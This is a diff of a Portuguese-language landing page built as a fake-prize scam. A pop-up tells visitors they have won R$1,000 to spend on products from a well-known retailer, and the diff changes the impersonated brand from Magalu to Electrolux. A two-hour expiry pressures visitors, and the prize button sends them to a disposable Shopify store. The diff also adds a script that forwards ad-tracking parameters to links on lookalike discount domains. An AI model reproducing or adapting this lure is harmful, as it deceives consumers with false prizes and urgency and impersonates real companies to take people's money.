--- a/ut/index.html
+++ b/ut/index.html
@@ -1,7 +1,6 @@
 
 
 
-
 <html><head>
     
   <meta charset="utf-8">
@@ -139,7 +138,7 @@
   <span class="close">×</span>
   <img src="https://c2.cdn1tp.net/1bcd9aff77e94f04877ed9d534aaef02/images/party-popper-emoji-503x512-0vkq9zgo.png" style="width: 30%;"> <br> <br>
   <h2>Parabéns, você ganhou R$ 1.000</h2> <br><br>
-  <p>Parabéns, você ganhou R$ 1.000 para usar como quiser nos produtos selecionados da linha Magalu. Para usá-los, basta clicar no botão abaixo e você será redirecionado para uma página onde seu saldo já está pronto para uso. Esse saldo expira dentro de 2 horas, por isso, é importante que você seja rápido com a sua compra.</p> <br><br>
+  <p>Parabéns, você ganhou R$ 1.000 para usar como quiser nos produtos selecionados da linha Electrolux. Para usá-los, basta clicar no botão abaixo e você será redirecionado para uma página onde seu saldo já está pronto para uso. Esse saldo expira dentro de 2 horas, por isso, é importante que você seja rápido com a sua compra.</p> <br><br>
   <button class="btn">Aproveitar meu prêmio</button>
 </div>
 </div>
@@ -189,18 +188,12 @@
   window.onclick = function(event) {
       if (event.target == modal) {
           modal.style.display = "none";
-
- // Adiciona parâmetros existentes na URL atual à nova URL
- var parametrosAtuais = window.location.search.substring(1);
- if (parametrosAtuais) {
- redirectURL += '&' + parametrosAtuais;
-
       }
   }
 
   // Ação do botão "Aproveitar meu prêmio"
   prizeBtn.onclick = function() {
-      window.open('https://e6c4c0-92.myshopify.com/collections/roleta', '_blank').focus();
+      window.open('https://2a69db-d1.myshopify.com/collections/roleta/?utm_source={{campaign.id}}&utm_medium={{campaign.name}}&utm_campaign={{adset.name}}&utm_content={{ad.name}}', '_blank').focus();
     
   }
 </script>
@@ -224,14 +217,24 @@ src="https://www.facebook.com/tr?id=876148574256207&ev=PageView&noscript=1"
 /></noscript>
 <!-- End Meta Pixel Code -->
 <script>
-    window.onload = function () {
-        var links = document.getElementsByTagName("a");
-        for (var i = 0, n = links.length; i < n; i++) {
-            var href = links[i].href.trim() +
-                    (links[i].href.indexOf("?") > 0 ? '&' : '?') +
-                    document.location.search.replace('?', '').toString();
-            links[i].href = href;
-        }
-    }
+        let prefix = ["https://noticiasde2024.fun/", "https://electrodescontos.online/"];
+        function getParams() {
+            let t = "",
+                e = window.top.location.href,
+                r = new URL(e);
+            if (null != r) {
+                let a = r.searchParams.get("utm_source"),
+                    n = r.searchParams.get("utm_medium"),
+                    o = r.searchParams.get("utm_campaign"),
+                    m = r.searchParams.get("utm_term"),
+                    c = r.searchParams.get("utm_content"); - 1 !== e.indexOf("?") && (t = `&sck=${a}|${n}|${o}|${m}|${c}`), console.log(t)
+            }
+            return t
+        } ! function () {
+            var t = new URLSearchParams(window.location.search);
+            t.toString() && document.querySelectorAll("a").forEach(function (e) {
+                for (let r = 0; r < prefix.length; r++) - 1 !== e.href.indexOf(prefix[r]) && (-1 === e.href.indexOf("?") ? e.href += "?" + t.toString() + getParams() : e.href += "&" + t.toString() + getParams())
+            })
+        }();
 </script>
                 </body></html>
